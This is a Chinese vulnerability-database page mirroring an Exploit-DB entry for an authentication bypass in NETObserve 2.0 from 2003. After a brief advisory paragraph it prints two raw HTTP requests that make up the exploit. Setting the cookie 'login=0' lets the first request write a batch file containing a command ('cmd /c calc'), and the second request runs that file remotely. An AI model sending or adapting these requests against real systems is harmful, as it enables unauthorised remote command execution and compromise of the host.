NETObserve 2.0 – Authentication Bypass

39次阅读
没有评论

NETObserve 2.0 – Authentication Bypass

漏洞ID 1054336 漏洞类型
发布时间 2003-12-29 更新时间 2003-12-29
NETObserve 2.0 - Authentication BypassCVE编号 N/A
NETObserve 2.0 - Authentication BypassCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23503
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9319/info

NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands remotely on an underlying system running the software. This may also expose privileged information about the system and its users. Successful exploitation will result in remote compromise of the system. 

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:WINDOWSwin.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:windowswin.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------

相关推荐: aVirt Rover POP3 Server Buffer Overflow DoS Vulnerability

aVirt Rover POP3 Server Buffer Overflow DoS Vulnerability 漏洞ID 1104423 漏洞类型 Boundary Condition Error 发布时间 1999-12-27 更新时间 1999-12-…

正文完
 0